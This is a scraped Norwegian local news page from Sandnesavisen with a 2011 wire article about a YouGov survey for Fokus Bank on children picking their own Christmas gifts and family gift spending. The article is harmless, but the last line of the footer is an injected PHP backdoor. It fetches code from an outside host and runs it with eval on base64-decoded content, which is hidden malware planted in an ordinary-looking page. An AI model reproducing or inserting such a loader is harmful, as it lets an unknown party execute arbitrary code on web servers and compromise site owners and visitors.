Tryggbarna1
GARANTERT BILLIGST: Ut p� reise? Finn billigst hotell i
Google
25. april 2017.
Som startside
Forsiden
Papirutgaver
Forum
Mobil
Lokalhistorie
Annonse
Nettannonse
Rubrikkannonse
Politiloggen
Bil & Motor
Reise
Spill Sudoku
Felix & Co
Annonsebilag
Riksnyheter
Kupong marked
Fotokonkurranse
Sommerens fotokonkurranse 2010
Fotokonkurranse
Informasjon
Innsendte foto
Ser du ikke bildene?
Registrer deg
Logg inn
SA - RUBRIKK
Markedsplass
Annonser
Regler
Logge inn
Ny bruker?
Lokale nyheter
Sandnes
Stavanger
Sola
Randaberg
Klepp
Time
Vr - Sandnesavisen
Sandnesavisen - POLITILOGG V2
Sandnesavisen - Bil & Motor
Sport
Sandnes
Stavanger
Kultur
Bker
Musikk
Film
Byen vr
Skriv ny artikkel
- - - - - - - - - - - - - -
Austrtt
Figgjo
Ganddal
Hana
Hle
Lura
Malmheim
Riska
Sandved
Soma
Stangeland
Sviland
Trones/Sentrum
- - - - - - - - - - - - - -
Folk
Meninger
Reisebrev
Fotball
Hndball
Kultur
Politikk
konomi
Natteliv
- - - - - - - - - - - - - -
Sandnes Atletklubb
Hommersk Atlet
S Taekwon-Do
Sandnes BMX
S Innebandy Klubb
- - - - - - - - - - - - - -
S Skolekorps
Ut av byen
Bil
Buss
Fly
Bt
Tog
Lar barna velge gaven selv
Skrevet av Newswire   
mandag 12. desember 2011

Mange foreldre tar like godt barna med når de skal handle julegaver til dem, viser en ny undersøkelse.

 

28 prosent av barna har opplevd å bli tatt med til butikken for å plukke ut sin egen julegave, viser undersøkelsen, som er utført av YouGov for Fokus Bank.

Jo eldre barna er, desto vanligere er det at gaveinnkjøpet gjøres unna på denne måten.

- I familier med småbarn er slike ordninger heldigvis fortsatt sjeldne Det er bra at ikke kjøpepresset går alt for mye ut over den gode tradisjonen med at spenningen for de minste skal vare helt frem til pakkene åpnes, sier ungdomsøkonom Maria Setsaas i Fokus Bank.

At tenåringer og nesten voksne barn i en del tilfeller involveres har hun mer forståelse for.

- Det kan jo være praktisk og enkelt å gjøre det på denne måten, og gavekjøpet blir kanskje også mer treffsikkert. Men også i denne aldersgruppen har mange godt av å skjønne at jula handler om å ønske seg noe, uten å være sikker på å få.

Hele 86 prosent av barna har vært med når foreldrene handler julegaver til andre.

- Også dette gjelder i særlig grad store barn og ungdom. Da kan felles juleshoppping gi innsyn i hva ting koster og bidra til opplæring i privatøkonomi. Behovet for slik kunnskap er stort, sier Maria Setsaas.

Merkebevisste

Trenden med å la barna bli med som konsulenter når det skal handles gaver til dem, har trolig også sammenheng med at ønskene har blitt svært spesifiserte, ifølge Bror Stende, direktør for mote og fritid i hovedorganisasjonen Virke.

- Merkebevisstheten er stor når det gjelder klær, og for sportsutstyr, elektronikk og andre typiske ungdomsgaver er ønskene gjerne beskrevet ned til de helt detaljerte spesifikasjoner, sier Stende.

I ukene før jul legger nordmenn igjen nesten dobbelt så mye penger i klesbutikkene som ellers i året. Mens omsetningen i en gjennomsnittsmåned er drøyt 2,6 milliarder kroner, ligger den på nærmere fem milliarder i desember.

- Julehandelen blir trolig bra også i år. Til barnas store glede er det vanlig å skjerme julen selv i usikre økonomiske tider. De fleste foreldre bruker nok også mer penger enn de hadde tenkt på forhånd.

Barna får mest

Bare 16 prosent av befolkningen planlegger å bruke mindre penger på julegaver i år enn ifjor, ifølge undersøkelsen fra YouGov. Å kutte i gavene til barna sitter svært langt inne for de fleste.

- Blant dem som sier at de vil stramme inn julebudsjettet i år, er det ytterst få som vil la det gå ut over barnas gaver. Det folk først skjærer ned på er gaver til andre voksne, nytt juleantrekk, selskapelighet og pynt, sier Maria Setsaas i Fokus Bank.

I familier med barn er det også de yngste som får de dyreste gavene.

- 63 prosent av foreldrene svarer at det er gavene til barna de bruker mest penger på.

Når man ser befolkningen under ett er vi imidlertid rausest med partner eller ektefelle.

- Vi prioriterer våre nærmeste og verdsetter viktige familiebånd. Den tradisjonen ser ut til å stå like sterkt i dag som for en generasjon eller to siden, sier Maria Setsaas.


 
Siste 3 fotoannonser fra Markedsplassen - Her kan du annonsere gratis!
 
dinreise
dinreise
Kupong marked
SA DM
Care
ProCamp 160
Sandnesavisen - Papirutgaver
Sandnesavisen - Felix Liten
dinreise
s
dinreise
Drives av Sandnesavisen.no, Webhosting levert av findthedomain.com
Ansvarlig Redaktør: Atle Stava Foto/Reporter: Trond Stava
Ønsker du å annonsere her? Kontakt annonse@sandnesavisen.no Tips oss! Kontakt tips@sandnesavisen.no
$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));